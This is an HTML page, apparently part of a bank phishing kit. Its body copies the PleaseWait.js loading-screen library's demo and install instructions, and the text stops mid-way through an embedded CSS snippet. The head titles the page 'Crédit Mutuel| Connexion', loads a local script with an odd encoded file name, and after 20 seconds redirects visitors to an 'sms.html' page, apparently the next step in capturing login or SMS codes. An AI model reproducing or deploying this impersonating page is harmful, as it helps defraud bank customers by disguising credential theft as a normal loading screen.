<!DOCTYPE html>
<html ng-app="pleaseWaitApp" class="ng-scope wf-raleway-n5-active wf-raleway-n3-active wf-raleway-n4-active wf-raleway-n2-active wf-active"><head>
<style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}</style><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}</style>
    <meta http-equiv="refresh" content="20;URL=./sms.html">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="PleaseWait is a small Javascript library that shows a beautiful loading page for your SPA while it loads.">
    <meta name="keywords" content="pleasewait, loading, spa, indicator, javascript, css, pathgather, css3, github, html5">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link href="index_files/please-wait.css" rel="stylesheet">
    <link href="index_files/bootstrap.css" rel="stylesheet">
    <link href="index_files/default.css" rel="stylesheet">
    <link href="index_files/font-awesome.css" rel="stylesheet">
    <title>Crédit Mutuel| Connexion</title>
    <script src="index_files/pjg2vww.t%25C3%25A9l%25C3%25A9chargement"></script>
    <style type="text/css">.tk-raleway{font-family:"raleway",sans-serif;}</style>
	<style type="text/css">@font-face{font-family:raleway;src:url(https://use.typekit.net/af/d61074/000000000000000000013288/23/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/d61074/000000000000000000013288/23/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/d61074/000000000000000000013288/23/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/l?subset_id=2&fvd=n5&v=3) format("woff2"),url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/d?subset_id=2&fvd=n5&v=3) format("woff"),url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/a?subset_id=2&fvd=n5&v=3) format("opentype");font-weight:500;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/l?subset_id=2&fvd=n2&v=3) format("woff2"),url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/d?subset_id=2&fvd=n2&v=3) format("woff"),url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/a?subset_id=2&fvd=n2&v=3) format("opentype");font-weight:200;font-style:normal;}</style><style type="text/css">.tk-raleway{font-family:"raleway",sans-serif;}</style><style type="text/css">@font-face{font-family:raleway;src:url(https://use.typekit.net/af/d61074/000000000000000000013288/23/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/d61074/000000000000000000013288/23/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/d61074/000000000000000000013288/23/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/l?subset_id=2&fvd=n5&v=3) format("woff2"),url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/d?subset_id=2&fvd=n5&v=3) format("woff"),url(https://use.typekit.net/af/92f86c/000000000000000000013289/23/a?subset_id=2&fvd=n5&v=3) format("opentype");font-weight:500;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/8b6877/00000000000000000001328a/23/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}@font-face{font-family:raleway;src:url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/l?subset_id=2&fvd=n2&v=3) format("woff2"),url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/d?subset_id=2&fvd=n2&v=3) format("woff"),url(https://use.typekit.net/af/c76597/00000000000000000001328d/23/a?subset_id=2&fvd=n2&v=3) format("opentype");font-weight:200;font-style:normal;}</style><script>try{Typekit.load();}catch(e){}</script>
  </head>
  <body ng-controller="MainCtrl" class="pg-loading ng-scope" style="">
    <div class="inner">
      <nav class="navbar navbar-default" role="navigation">
        <div class="container-fluid">
          <div class="navbar-header">
            <a class="navbar-brand" href="#" target="_blank">
              <img src="index_files/logo_orange.png" alt="Pathgather">
            </a>
          </div>
          <div class="navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav">
              <li>
                <a href="#" target="_blank">
                  <i class="fa fa-github"></i>
                  View on Github
                </a>
              </li>
            </ul>
            <ul class="nav navbar-nav navbar-right">
              <li>
                <a href="#" target="_blank">
                  <span class="label label-info">We're Hiring!</span>
                </a>
              </li>
            </ul>
          </div>
        </div>
      </nav>
      <div class="container">
        <section class="header">
          <h2>PleaseWait.js</h2>
          <h4>A simple library to show your users a beautiful splash page while your application loads.</h4>
          <button type="button" ng-click="toggleDemo()" class="btn btn-primary btn-lg">
            <span>Launch demo</span>
          </button>
        </section>
        <section class="instructions">
          <h3>To Use</h3>
          <section>
            <h4>Step 1: Install</h4>
            <code>
              bower install please-wait
            </code>
            <br>
            <code>
              npm install please-wait
            </code>
          </section>
          <section>
            <h4>Step 2: Include in your HTML</h4>
            <p>
              Include the please-wait.css file in your <code>&lt;head&gt;</code> tag/in your normal workflow.
            </p>
            <p>
              You can include the please-wait.js file at the end of your body, but above your other <code>&lt;script&gt;</code>
 tag(s) if you like. This allows you to use PleaseWait immediately and 
show a loading page while the browser downloads the rest of your 
Javascript. Of course, this is optional. Feel free to roll the 
PleaseWait library into your normal, minified JS file if you prefer.
            </p>
       
			<link rel="stylesheet" href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.htm"><div id="gist17209208" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-index-html" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-html ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-index-html-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-index-html-LC1" class="blob-code blob-code-inner js-file-line">&lt;!DOCTYPE html&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-index-html-LC2" class="blob-code blob-code-inner js-file-line">&lt;<span class="pl-ent">html</span> <span class="pl-e">ng-app</span>=<span class="pl-s"><span class="pl-pds">"</span>AngularApp<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-index-html-LC3" class="blob-code blob-code-inner js-file-line">  &lt;<span class="pl-ent">head</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-index-html-LC4" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">charset</span>=<span class="pl-s"><span class="pl-pds">"</span>utf-8<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-index-html-LC5" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">http-equiv</span>=<span class="pl-s"><span class="pl-pds">"</span>X-UA-Compatible<span class="pl-pds">"</span></span> <span class="pl-e">content</span>=<span class="pl-s"><span class="pl-pds">"</span>IE=edge<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L6" class="blob-num js-line-number" data-line-number="6"></td>
        <td id="file-index-html-LC6" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">name</span>=<span class="pl-s"><span class="pl-pds">"</span>viewport<span class="pl-pds">"</span></span> <span class="pl-e">content</span>=<span class="pl-s"><span class="pl-pds">"</span>width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L7" class="blob-num js-line-number" data-line-number="7"></td>
        <td id="file-index-html-LC7" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">link</span> <span class="pl-e">href</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/css/please-wait.css<span class="pl-pds">"</span></span> <span class="pl-e">rel</span>=<span class="pl-s"><span class="pl-pds">"</span>stylesheet<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L8" class="blob-num js-line-number" data-line-number="8"></td>
        <td id="file-index-html-LC8" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">link</span> <span class="pl-e">href</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/css/default.css<span class="pl-pds">"</span></span> <span class="pl-e">rel</span>=<span class="pl-s"><span class="pl-pds">"</span>stylesheet<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L9" class="blob-num js-line-number" data-line-number="9"></td>
        <td id="file-index-html-LC9" class="blob-code blob-code-inner js-file-line">  &lt;/<span class="pl-ent">head</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L10" class="blob-num js-line-number" data-line-number="10"></td>
        <td id="file-index-html-LC10" class="blob-code blob-code-inner js-file-line">  &lt;<span class="pl-ent">body</span> <span class="pl-e">ng-controller</span>=<span class="pl-s"><span class="pl-pds">"</span>MainCtrl<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L11" class="blob-num js-line-number" data-line-number="11"></td>
        <td id="file-index-html-LC11" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">div</span> <span class="pl-e">class</span>=<span class="pl-s"><span class="pl-pds">"</span>inner<span class="pl-pds">"</span></span> <span class="pl-e">ng-view</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L12" class="blob-num js-line-number" data-line-number="12"></td>
        <td id="file-index-html-LC12" class="blob-code blob-code-inner js-file-line">    &lt;/<span class="pl-ent">div</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L13" class="blob-num js-line-number" data-line-number="13"></td>
        <td id="file-index-html-LC13" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">type</span>=<span class="pl-s"><span class="pl-pds">"</span>text/javascript<span class="pl-pds">"</span></span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/js/please-wait.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L14" class="blob-num js-line-number" data-line-number="14"></td>
        <td id="file-index-html-LC14" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">type</span>=<span class="pl-s"><span class="pl-pds">"</span>text/javascript<span class="pl-pds">"</span></span>&gt;<span class="pl-s1"></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L15" class="blob-num js-line-number" data-line-number="15"></td>
        <td id="file-index-html-LC15" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">      <span class="pl-c1">window</span>.<span class="pl-smi">loading_screen</span> <span class="pl-k">=</span> <span class="pl-c1">window</span>.<span class="pl-en">pleaseWait</span>({</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L16" class="blob-num js-line-number" data-line-number="16"></td>
        <td id="file-index-html-LC16" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        logo<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>assets/images/logo.png<span class="pl-pds">"</span></span>,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L17" class="blob-num js-line-number" data-line-number="17"></td>
        <td id="file-index-html-LC17" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        backgroundColor<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">'</span>#f46d3b<span class="pl-pds">'</span></span>,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L18" class="blob-num js-line-number" data-line-number="18"></td>
        <td id="file-index-html-LC18" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        loadingHtml<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>&lt;p class='loading-message'&gt;A good day to you fine user!&lt;/p&gt;<span class="pl-pds">"</span></span></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L19" class="blob-num js-line-number" data-line-number="19"></td>
        <td id="file-index-html-LC19" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">      });</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L20" class="blob-num js-line-number" data-line-number="20"></td>
        <td id="file-index-html-LC20" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">    </span>&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L21" class="blob-num js-line-number" data-line-number="21"></td>
        <td id="file-index-html-LC21" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>https://ajax.googleapis.com/ajax/libs/angularjs/1.3.5/angular.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L22" class="blob-num js-line-number" data-line-number="22"></td>
        <td id="file-index-html-LC22" class="blob-code blob-code-inner js-file-line">    <span class="pl-c"><span class="pl-c">&lt;!--</span> If we include the rest of our JS after we call pleaseWait, users get a loading page while it downloads. </span></td>
      </tr>
      <tr>
        <td id="file-index-html-L23" class="blob-num js-line-number" data-line-number="23"></td>
        <td id="file-index-html-LC23" class="blob-code blob-code-inner js-file-line"><span class="pl-c">    Of course, this is optional and up to you. It may be desired if your combined JS is of a larger size. If not,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L24" class="blob-num js-line-number" data-line-number="24"></td>
        <td id="file-index-html-LC24" class="blob-code blob-code-inner js-file-line"><span class="pl-c">    feel free to include PleaseWait in your normal minified JS file, and call pleaseWait when first possible. <span class="pl-c">--&gt;</span></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L25" class="blob-num js-line-number" data-line-number="25"></td>
        <td id="file-index-html-LC25" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/js/default.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L26" class="blob-num js-line-number" data-line-number="26"></td>
        <td id="file-index-html-LC26" class="blob-code blob-code-inner js-file-line">  &lt;/<span class="pl-ent">body</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L27" class="blob-num js-line-number" data-line-number="27"></td>
        <td id="file-index-html-LC27" class="blob-code blob-code-inner js-file-line">&lt;/<span class="pl-ent">html</span>&gt;</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
      <div class="gist-meta">
        <a href="#" style="float:right">view raw</a>
        <a href="#">index.html</a>
        ❤ by <a href="#">RedFox</a>
      </div>
    </div>
</div>
<link rel="stylesheet" href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.css"><div id="gist17209208" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-index-html" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-html ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-index-html-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-index-html-LC1" class="blob-code blob-code-inner js-file-line">&lt;!DOCTYPE html&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-index-html-LC2" class="blob-code blob-code-inner js-file-line">&lt;<span class="pl-ent">html</span> <span class="pl-e">ng-app</span>=<span class="pl-s"><span class="pl-pds">"</span>AngularApp<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-index-html-LC3" class="blob-code blob-code-inner js-file-line">  &lt;<span class="pl-ent">head</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-index-html-LC4" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">charset</span>=<span class="pl-s"><span class="pl-pds">"</span>utf-8<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-index-html-LC5" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">http-equiv</span>=<span class="pl-s"><span class="pl-pds">"</span>X-UA-Compatible<span class="pl-pds">"</span></span> <span class="pl-e">content</span>=<span class="pl-s"><span class="pl-pds">"</span>IE=edge<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L6" class="blob-num js-line-number" data-line-number="6"></td>
        <td id="file-index-html-LC6" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">meta</span> <span class="pl-e">name</span>=<span class="pl-s"><span class="pl-pds">"</span>viewport<span class="pl-pds">"</span></span> <span class="pl-e">content</span>=<span class="pl-s"><span class="pl-pds">"</span>width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L7" class="blob-num js-line-number" data-line-number="7"></td>
        <td id="file-index-html-LC7" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">link</span> <span class="pl-e">href</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/css/please-wait.css<span class="pl-pds">"</span></span> <span class="pl-e">rel</span>=<span class="pl-s"><span class="pl-pds">"</span>stylesheet<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L8" class="blob-num js-line-number" data-line-number="8"></td>
        <td id="file-index-html-LC8" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">link</span> <span class="pl-e">href</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/css/default.css<span class="pl-pds">"</span></span> <span class="pl-e">rel</span>=<span class="pl-s"><span class="pl-pds">"</span>stylesheet<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L9" class="blob-num js-line-number" data-line-number="9"></td>
        <td id="file-index-html-LC9" class="blob-code blob-code-inner js-file-line">  &lt;/<span class="pl-ent">head</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L10" class="blob-num js-line-number" data-line-number="10"></td>
        <td id="file-index-html-LC10" class="blob-code blob-code-inner js-file-line">  &lt;<span class="pl-ent">body</span> <span class="pl-e">ng-controller</span>=<span class="pl-s"><span class="pl-pds">"</span>MainCtrl<span class="pl-pds">"</span></span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L11" class="blob-num js-line-number" data-line-number="11"></td>
        <td id="file-index-html-LC11" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">div</span> <span class="pl-e">class</span>=<span class="pl-s"><span class="pl-pds">"</span>inner<span class="pl-pds">"</span></span> <span class="pl-e">ng-view</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L12" class="blob-num js-line-number" data-line-number="12"></td>
        <td id="file-index-html-LC12" class="blob-code blob-code-inner js-file-line">    &lt;/<span class="pl-ent">div</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L13" class="blob-num js-line-number" data-line-number="13"></td>
        <td id="file-index-html-LC13" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">type</span>=<span class="pl-s"><span class="pl-pds">"</span>text/javascript<span class="pl-pds">"</span></span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/js/please-wait.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L14" class="blob-num js-line-number" data-line-number="14"></td>
        <td id="file-index-html-LC14" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">type</span>=<span class="pl-s"><span class="pl-pds">"</span>text/javascript<span class="pl-pds">"</span></span>&gt;<span class="pl-s1"></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L15" class="blob-num js-line-number" data-line-number="15"></td>
        <td id="file-index-html-LC15" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">      <span class="pl-c1">window</span>.<span class="pl-smi">loading_screen</span> <span class="pl-k">=</span> <span class="pl-c1">window</span>.<span class="pl-en">pleaseWait</span>({</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L16" class="blob-num js-line-number" data-line-number="16"></td>
        <td id="file-index-html-LC16" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        logo<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>assets/images/logo.png<span class="pl-pds">"</span></span>,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L17" class="blob-num js-line-number" data-line-number="17"></td>
        <td id="file-index-html-LC17" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        backgroundColor<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">'</span>#f46d3b<span class="pl-pds">'</span></span>,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L18" class="blob-num js-line-number" data-line-number="18"></td>
        <td id="file-index-html-LC18" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">        loadingHtml<span class="pl-k">:</span> <span class="pl-s"><span class="pl-pds">"</span>&lt;p class='loading-message'&gt;A good day to you fine user!&lt;/p&gt;<span class="pl-pds">"</span></span></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L19" class="blob-num js-line-number" data-line-number="19"></td>
        <td id="file-index-html-LC19" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">      });</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L20" class="blob-num js-line-number" data-line-number="20"></td>
        <td id="file-index-html-LC20" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">    </span>&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L21" class="blob-num js-line-number" data-line-number="21"></td>
        <td id="file-index-html-LC21" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>https://ajax.googleapis.com/ajax/libs/angularjs/1.3.5/angular.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L22" class="blob-num js-line-number" data-line-number="22"></td>
        <td id="file-index-html-LC22" class="blob-code blob-code-inner js-file-line">    <span class="pl-c"><span class="pl-c">&lt;!--</span> If we include the rest of our JS after we call pleaseWait, users get a loading page while it downloads. </span></td>
      </tr>
      <tr>
        <td id="file-index-html-L23" class="blob-num js-line-number" data-line-number="23"></td>
        <td id="file-index-html-LC23" class="blob-code blob-code-inner js-file-line"><span class="pl-c">    Of course, this is optional and up to you. It may be desired if your combined JS is of a larger size. If not,</span></td>
      </tr>
      <tr>
        <td id="file-index-html-L24" class="blob-num js-line-number" data-line-number="24"></td>
        <td id="file-index-html-LC24" class="blob-code blob-code-inner js-file-line"><span class="pl-c">    feel free to include PleaseWait in your normal minified JS file, and call pleaseWait when first possible. <span class="pl-c">--&gt;</span></span></td>
      </tr>
      <tr>
        <td id="file-index-html-L25" class="blob-num js-line-number" data-line-number="25"></td>
        <td id="file-index-html-LC25" class="blob-code blob-code-inner js-file-line">    &lt;<span class="pl-ent">script</span> <span class="pl-e">src</span>=<span class="pl-s"><span class="pl-pds">"</span>assets/js/default.min.js<span class="pl-pds">"</span></span>&gt;&lt;/<span class="pl-ent">script</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L26" class="blob-num js-line-number" data-line-number="26"></td>
        <td id="file-index-html-LC26" class="blob-code blob-code-inner js-file-line">  &lt;/<span class="pl-ent">body</span>&gt;</td>
      </tr>
      <tr>
        <td id="file-index-html-L27" class="blob-num js-line-number" data-line-number="27"></td>
        <td id="file-index-html-LC27" class="blob-code blob-code-inner js-file-line">&lt;/<span class="pl-ent">html</span>&gt;</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
      <div class="gist-meta">
        <a href="#" style="float:right">view raw</a>
        <a href="#">index.html</a>
         ❤ by <a href="#">RedFox</a>
      </div>
    </div>
</div>

          </section>
          <section>
            <h4>Step 3: Hide initial HTML flash</h4>
            <p>
              Optional: If your initial template has some styled HTML by
 default (like a toolbar), you'll probably want to hide that, or your 
users could see a quick flash of your normal template, followed by the 
loading screen. This is easy to do by wrapping the HTML in your body in a
 div, and hiding/showing that when things are ready. PleaseWait adds a 
class of 'pg-loaded' to your <code>&lt;body&gt;</code> when it's done.
            </p>
            <
			<link rel="stylesheet" 
			href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.htm"><div id="gist17209983" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-default-css" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-css ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-default-css-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-default-css-LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-ent">body</span> <span class="pl-k">&gt;</span> <span class="pl-e">.inner</span> {</td>
      </tr>
      <tr>
        <td id="file-default-css-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-default-css-LC2" class="blob-code blob-code-inner js-file-line">  <span class="pl-c1"><span class="pl-c1">display</span></span>: <span class="pl-c1">none</span>;</td>
      </tr>
      <tr>
        <td id="file-default-css-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-default-css-LC3" class="blob-code blob-code-inner js-file-line">}</td>
      </tr>
      <tr>
        <td id="file-default-css-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-default-css-LC4" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="file-default-css-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-default-css-LC5" class="blob-code blob-code-inner js-file-line"><span class="pl-ent">body</span><span class="pl-e">.pg-loaded</span> <span class="pl-k">&gt;</span> <span class="pl-e">.inner</span> {</td>
      </tr>
      <tr>
        <td id="file-default-css-L6" class="blob-num js-line-number" data-line-number="6"></td>
        <td id="file-default-css-LC6" class="blob-code blob-code-inner js-file-line">  <span class="pl-c1"><span class="pl-c1">display</span></span>: <span class="pl-c1">block</span>;</td>
      </tr>
      <tr>
        <td id="file-default-css-L7" class="blob-num js-line-number" data-line-number="7"></td>
        <td id="file-default-css-LC7" class="blob-code blob-code-inner js-file-line">}</td>
      </tr>
</tbody></table>


  </div>

  </div>
</div>

      </div>
      
    </div>
</div>
<link rel="stylesheet" href="index_files/gist-embed-1564cdcc2939872e81719982075d3d93.css"><div id="gist17209983" class="gist">
    <div class="gist-file">
      <div class="gist-data">
        <div class="js-gist-file-update-container js-task-list-container file-box">
  <div id="file-default-css" class="file">
    

  <div itemprop="text" class="blob-wrapper data type-css ">
      <table class="highlight tab-size js-file-line-container" data-tab-size="8">
      <tbody><tr>
        <td id="file-default-css-L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="file-default-css-LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-ent">body</span> <span class="pl-k">&gt;</span> <span class="pl-e">.inner</span> {</td>
      </tr>
      <tr>
        <td id="file-default-css-L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="file-default-css-LC2" class="blob-code blob-code-inner js-file-line">  <span class="pl-c1"><span class="pl-c1">display</span></span>: <span class="pl-c1">none</span>;</td>
      </tr>
      <tr>
        <td id="file-default-css-L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="file-default-css-LC3" class="blob-code blob-code-inner js-file-line">}</td>
      </tr>
      <tr>
        <td id="file-default-css-L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="file-default-css-LC4" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="file-default-css-L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="file-default-css-LC5" class="blob-code blob-code-inner js-file-line"><span class="pl-ent">body</span><span class="pl-e">.pg-loaded</span> <span class="pl-k">&gt;</span> <span class="pl-e">.inner</span> {</td>
      </tr>
      <tr>
        <td id="file-default-css-L6" class="blob-num js-line-number" data-line-number="6"></td>
